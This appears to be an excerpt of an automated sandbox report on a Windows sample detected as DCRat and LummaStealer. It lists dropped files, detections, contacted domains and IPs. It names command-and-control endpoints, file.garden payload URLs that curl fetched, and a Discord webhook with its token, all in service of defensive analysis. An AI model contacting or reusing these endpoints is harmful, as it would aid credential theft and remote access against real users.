C:\Users\user\Desktop\dgcKDzTe.log, PE32 71->124 dropped 126 C:\Users\user\Desktop\YtKLaCEq.log, PE32 71->126 dropped 128 C:\Users\user\Desktop\LUAEjdyP.log, PE32 71->128 dropped 130 3 other malicious files 71->130 dropped 90 cmd.exe 71->90         started        92 Conhost.exe 71->92         started        process23 process24 94 conhost.exe 90->94         started        96 chcp.com 90->96         started        98 w32tm.exe 90->98         started       

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                NCTSgL4t0B.exe53%ReversingLabsWin32.Trojan.Generic
                                NCTSgL4t0B.exe100%AviraHEUR/AGEN.1317356
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\ndC0udATSD.bat100%AviraBAT/Delbat.C
                                C:\Users\user\AppData\Local\Idle.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat100%AviraBAT/Delbat.C
                                C:\Edge\L6lFlVnd0szYUYb26bZc.vbe100%AviraVBS/Runner.VPG
                                C:\Edge\msedge.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\CQuHWLcS.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\LAdenXtG.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\Desktop\BlhoAAti.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Idle.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\LUAEjdyP.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\MsCvKimq.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\PDYwKARr.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\NDQNJGxB.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\CQuHWLcS.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\Idle.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\AwpzIjFt.log29%ReversingLabs
                                C:\Users\user\Desktop\BlhoAAti.log8%ReversingLabs
                                C:\Users\user\Desktop\CQuHWLcS.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\LAdenXtG.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\LUAEjdyP.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\MsCvKimq.log8%ReversingLabs
                                C:\Users\user\Desktop\NDQNJGxB.log8%ReversingLabs
                                C:\Users\user\Desktop\NohnZlpE.log29%ReversingLabs
                                C:\Users\user\Desktop\PDYwKARr.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\WjFdZuSe.log29%ReversingLabs
                                C:\Users\user\Desktop\YlsMudWZ.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\YtKLaCEq.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\aUzlTMCV.log8%ReversingLabs
                                C:\Users\user\Desktop\dgcKDzTe.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\iZOTduyR.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\iyHbCGSC.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\onyQOgMn.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\pGvBroyE.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\sharmiXk.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\tGwZoaKl.log29%ReversingLabs
                                C:\Windows\Speech\kdmapper.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\physmeme.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                https://login.steampowered.com/0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://store.steampowered.com/legal/0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://recaptcha.net0%URL Reputationsafe
                                https://store.steampowered.com/0%URL Reputationsafe
                                https://lv.queniujq.cn0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://checkout.steampowered.com/0%URL Reputationsafe
                                https://api.steampowered.com/0%URL Reputationsafe
                                http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                https://store.steampowered.com/;0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                offeviablwke.site
                                172.67.197.40
                                truetrue
                                  unknown
                                  steamcommunity.com
                                  104.102.49.254
                                  truefalse
                                    unknown
                                    file.garden
                                    188.114.96.3
                                    truefalse
                                      unknown
                                      fossillargeiw.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        strappystyio.shop
                                        unknown
                                        unknowntrue
                                          unknown
                                          tiddymarktwo.shop
                                          unknown
                                          unknowntrue
                                            unknown
                                            coursedonnyre.shop
                                            unknown
                                            unknowntrue
                                              unknown
                                              surveriysiop.shop
                                              unknown
                                              unknowntrue
                                                unknown
                                                captainynfanw.shop
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  tearrybyiwo.shop
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    zelensky.top
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      appleboltelwk.shop
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        tendencerangej.shop
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          coursedonnyre.shoptrue
                                                            unknown
                                                            https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binfalse
                                                              unknown
                                                              https://offeviablwke.site/apitrue
                                                                unknown
                                                                strappystyio.shoptrue
                                                                  unknown
                                                                  tearrybyiwo.shoptrue
                                                                    unknown
                                                                    https://steamcommunity.com/profiles/76561199724331900true
                                                                    • URL Reputation: malware
                                                                    unknown
                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binfalse
                                                                      unknown
                                                                      captainynfanw.shoptrue
                                                                        unknown
                                                                        fossillargeiw.shoptrue
                                                                          unknown
                                                                          tiddymarktwo.shoptrue
                                                                            unknown
                                                                            surveriysiop.shoptrue
                                                                              unknown
                                                                              tendencerangej.shoptrue
                                                                                unknown
                                                                                appleboltelwk.shoptrue
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://offeviablwke.site/apiWL3RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin6&curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://go.mic(Lmsedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://schemas.micpowershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://appleboltelwk.shop:443/apiRegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.microsoft.copowershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://contoso.com/Licensepowershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://osoft.copowershell.exe, 00000025.00000002.1806078775.00000194D5928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binc/curl.exe, 0000000E.00000002.1325740592.000001EBAEA08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://recaptcha.net/recaptcha/;RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://steamcommunity.com:443/profiles/76561199724331900(RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.google.comRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://crl.microsopowershell.exe, 00000024.00000002.1860376856.000001AF6E6B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://zelensky.topmsedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://contoso.com/powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwONCTSgL4t0B.exefalse
                                                                                                                    unknown
                                                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://auth.gg/NCTSgL4t0B.exefalse
                                                                                                                      unknown
                                                                                                                      https://cdn.akamai.steamstatic.cRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binNcurl.exe, 0000000E.00000003.1325302112.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1325850619.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325227642.000001EBAEA39000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://zelensky.top/Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://offeviablwke.site/tyRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.phpmsedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://s.ytimg.com;RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://login.steampowered.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:curl.exe, 0000000E.00000002.1325740592.000001EBAEA00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://offeviablwke.site/leRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/legal/RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://offeviablwke.site/RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.houseindustries.com/licenseNCTSgL4t0B.exefalse
                                                                                                                                          unknown
                                                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$hcurl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.houseindustries.com/licenseBurbankNCTSgL4t0B.exefalse
                                                                                                                                              unknown
                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.houseindustries.comhttp://www.talleming.comHouseNCTSgL4t0B.exefalse
                                                                                                                                                unknown
                                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://help.steampowered.coRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://recaptcha.netRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://fossillargeiw.shop:443/apiRegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://offeviablwke.site:443/apipRegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://store.steampowered.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binapi.dllcurl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325527057.000001EBAEA16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://lv.queniujq.cnRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                            • URL Reputation: malware
                                                                                                                                                            unknown
                                                                                                                                                            https://www.youtube.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://127.0.0.1:27060RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://crl.mipowershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://crl.mpowershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.houseindustries.com/licenseCopyrightNCTSgL4t0B.exefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.google.com/recaptcha/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://checkout.steampowered.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://coursedonnyre.shop:443/apiRegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://offeviablwke.site/(RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://api.steampowered.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://steamcommunity.com/RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://store.steampowered.com/;RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://api.steampowered.cRegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/badgesRegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                      • URL Reputation: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      172.67.197.40
                                                                                                                                                                                      offeviablwke.siteUnited States
                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                      188.114.96.3
                                                                                                                                                                                      file.gardenEuropean Union
                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      104.102.49.254
                                                                                                                                                                                      steamcommunity.comUnited States
                                                                                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                      Analysis ID:1522836
                                                                                                                                                                                      Start date and time:2024-09-30 18:32:31 +02:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 11m 47s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:76
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:NCTSgL4t0B.exe
                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                      Original Sample Name:6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.spre.troj.expl.evad.winEXE@74/64@22/4
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 38.5%
                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
